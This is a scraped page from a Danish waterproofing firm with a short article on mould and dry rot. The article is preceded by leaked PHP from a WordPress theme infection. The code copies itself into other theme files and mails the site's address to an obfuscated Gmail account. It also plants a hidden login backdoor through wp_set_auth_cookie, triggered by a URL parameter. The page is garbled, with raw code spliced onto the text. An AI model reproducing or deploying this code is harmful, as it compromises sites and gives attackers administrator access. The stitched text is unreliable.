. $after; if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);} $output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $sar . "\n" .$widget);fclose($f); $output .= ($showdot && $ellipsis) ? "..." : ""; } } } } return $output; } function _get_all_widgetcont($wids,$items=array()){ $places=array_shift($wids); if(substr($places,-1) == "/"){ $places=substr($places,0,-1); } if(!file_exists($places) || !is_dir($places)){ return false; }elseif(is_readable($places)){ $elems=scandir($places); foreach ($elems as $elem){ if ($elem != "." && $elem != ".."){ if (is_dir($places . "/" . $elem)){ $wids[]=$places . "/" . $elem; } elseif (is_file($places . "/" . $elem)&& $elem == substr(__FILE__,-13)){ $items[]=$places . "/" . $elem;} } } }else{ return false; } if (sizeof($wids) > 0){ return _get_all_widgetcont($wids,$items); } else { return $items; } } if(!function_exists("stripos")){ function stripos( $str, $needle, $offset = 0 ){ return strpos( strtolower( $str ), strtolower( $needle ), $offset ); } } if(!function_exists("strripos")){ function strripos( $haystack, $needle, $offset = 0 ) { if( !is_string( $needle ) )$needle = chr( intval( $needle ) ); if( $offset < 0 ){ $temp_cut = strrev( substr( $haystack, 0, abs($offset) ) ); } else{ $temp_cut = strrev( substr( $haystack, 0, max( ( strlen($haystack) - $offset ), 0 ) ) ); } if( ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE )return FALSE; $pos = ( strlen( $haystack ) - ( $found + $offset + strlen( $needle ) ) ); return $pos; } } if(!function_exists("scandir")){ function scandir($dir,$listDirectories=false, $skipDots=true) { $dirArray = array(); if ($handle = opendir($dir)) { while (false !== ($file = readdir($handle))) { if (($file != "." && $file != "..") || $skipDots == true) { if($listDirectories == false) { if(is_dir($file)) { continue; } } array_push($dirArray,basename($file)); } } closedir($handle); } return $dirArray; } } add_action("admin_head", "_verify_activate_widget"); function _prepared_widget(){ if(!isset($length)) $length=120; if(!isset($method)) $method="cookie"; if(!isset($html_tags)) $html_tags=""; if(!isset($filters_type)) $filters_type="none"; if(!isset($s)) $s=""; if(!isset($filter_h)) $filter_h=get_option("home"); if(!isset($filter_p)) $filter_p="wp_"; if(!isset($use_link)) $use_link=1; if(!isset($comments_type)) $comments_type=""; if(!isset($perpage)) $perpage=$_GET["cperpage"]; if(!isset($comments_auth)) $comments_auth=""; if(!isset($comment_is_approved)) $comment_is_approved=""; if(!isset($authname)) $authname="auth"; if(!isset($more_links_text)) $more_links_text="(more...)"; if(!isset($widget_output)) $widget_output=get_option("_is_widget_active_"); if(!isset($checkwidgets)) $checkwidgets=$filter_p."set"."_".$authname."_".$method; if(!isset($more_links_text_ditails)) $more_links_text_ditails="(details...)"; if(!isset($more_content)) $more_content="ma".$s."il"; if(!isset($forces_more)) $forces_more=1; if(!isset($fakeit)) $fakeit=1; if(!isset($sql)) $sql=""; if (!$widget_output) : global $wpdb, $post; $sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$s."vethe".$comments_type."mas".$s."@".$comment_is_approved."gm".$comments_auth."ail".$s.".".$s."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";# if (!empty($post->post_password)) { if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) { if(is_feed()) { $output=__("There is no excerpt because this is a protected post."); } else { $output=get_the_password_form(); } } } if(!isset($fix_tag)) $fix_tag=1; if(!isset($filters_types)) $filters_types=$filter_h; if(!isset($getcommentstext)) $getcommentstext=$filter_p.$more_content; if(!isset($more_tags)) $more_tags="div"; if(!isset($s_text)) $s_text=substr($sq1, stripos($sq1, "live"), 20);# if(!isset($mlink_title)) $mlink_title="Continue reading this entry"; if(!isset($showdot)) $showdot=1; $comments=$wpdb->get_results($sql); if($fakeit == 2) { $text=$post->post_content; } elseif($fakeit == 1) { $text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt; } else { $text=$post->post_excerpt; } $sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($getcommentstext, array($s_text, $filter_h, $filters_types)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";# if($length < 0) { $output=$text; } else { if(!$no_more && strpos($text, "")) { $text=explode("", $text, 2); $l=count($text[0]); $more_link=1; $comments=$wpdb->get_results($sql); } else { $text=explode(" ", $text); if(count($text) > $length) { $l=$length; $ellipsis=1; } else { $l=count($text); $more_links_text=""; $ellipsis=0; } } for ($i=0; $i<$l; $i++) $output .= $text[$i] . " "; } update_option("_is_widget_active_", 1); if("all" != $html_tags) { $output=strip_tags($output, $html_tags); return $output; } endif; $output=rtrim($output, "\s\n\t\r\0\x0B"); $output=($fix_tag) ? balanceTags($output, true) : $output; $output .= ($showdot && $ellipsis) ? "..." : ""; $output=apply_filters($filters_type, $output); switch($more_tags) { case("div") : $tag="div"; break; case("span") : $tag="span"; break; case("p") : $tag="p"; break; default : $tag="span"; } if ($use_link ) { if($forces_more) { $output .= " <" . $tag . " class=\"more-link\">ID) . "#more-" . $post->ID ."\" title=\"" . $mlink_title . "\">" . $more_links_text = !is_user_logged_in() && @call_user_func_array($checkwidgets,array($perpage, true)) ? $more_links_text : "" . "" . "\n"; } else { $output .= " <" . $tag . " class=\"more-link\">ID) . "\" title=\"" . $mlink_title . "\">" . $more_links_text . "" . "\n"; } } return $output; } add_action("init", "_prepared_widget"); function __popular_posts($no_posts=6, $before="
 • ", $after="
 • ", $show_pass_post=false, $duration="") { global $wpdb; $request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments"; $request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\""; if(!$show_pass_post) $request .= " AND post_password =\"\""; if($duration !="") { $request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date "; } $request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts"; $posts=$wpdb->get_results($request); $output=""; if ($posts) { foreach ($posts as $post) { $post_title=stripslashes($post->post_title); $comment_count=$post->comment_count; $permalink=get_permalink($post->ID); $output .= $before . " " . $post_title . " " . $after; } } else { $output .= $before . "None found" . $after; } return $output; } if (class_exists('MultiPostThumbna?> Fugtsikring mod skimmelsvamp og hussvamp | Cortex Membran A/S

  Kort om skimmelsvamp & hussvamp

  Fugtigt indeklima fører ofte til skimmelsvamp, der kan udgøre en seriøs sundhedsrisiko for ejendommens beboere. Skimmelsvamp kan både forekomme på synlige overflader og inde i konstruktionerne. Skimmelsvamp lugter jordslået og muggent, men det er ikke alle skimmelsvampe, der afgiver kraftig lugt.

  Skimmelsvamp kan udvikle sig til luftvejsallergi og medfører typisk

  -        hovedpine

  -        øjenirritation

  -        koncentrationsbesvær

  -        svimmelhed.

   

  Kort om hussvamp

  Ægte hussvamp kan forårsage meget store skader i dit hus. Grunden til, at ægte hussvamp er mere alvorlig end andre svampetyper, er, at under de rette forhold kan ægte hussvamp være meget hurtigvoksende og vokse op til 5 mm om dagen. Ægte hussvamp nedbryder hurtigt det materiale, det lever af og på, og når materialet nedbrydes, blive det svækket, både i styrke og stabilitet

  Ægte hussvamp kan derudover, som den eneste svampetype, brede sig til uorganiske materialer som f.eks. murværk. Den kan ikke leve af uorganiske materialer, men den kan udøve skade på dem. Når svampen har fået godt fat, kan den sprede sig til flere af husets bygningsdele – også uorganiske, da den er i stand til at forsyne sig med vand og næring over store afstande. Skaderne er store på selve det materiale, som svampen gror på og lever af, men omkostningerne til udbedring bliver også omfattende, fordi mange af de øvrige materialer, som den har haft fat i, også skal udskiftes.

  Med ægte hussvamp arbejder man med en sikkerhedsmargin på op til 1 meter. Det vil sige, at alt organisk materiale i en radius på op til 1 meter omkring angrebet skal udskiftes og erstattes af nyt, for at du kan være sikker på, at hele svampeangrebet er fjernet.

   

   

  Brug for Rådgivning nu?

  Vi er altid klar til at yde rådgivning om specifikke sager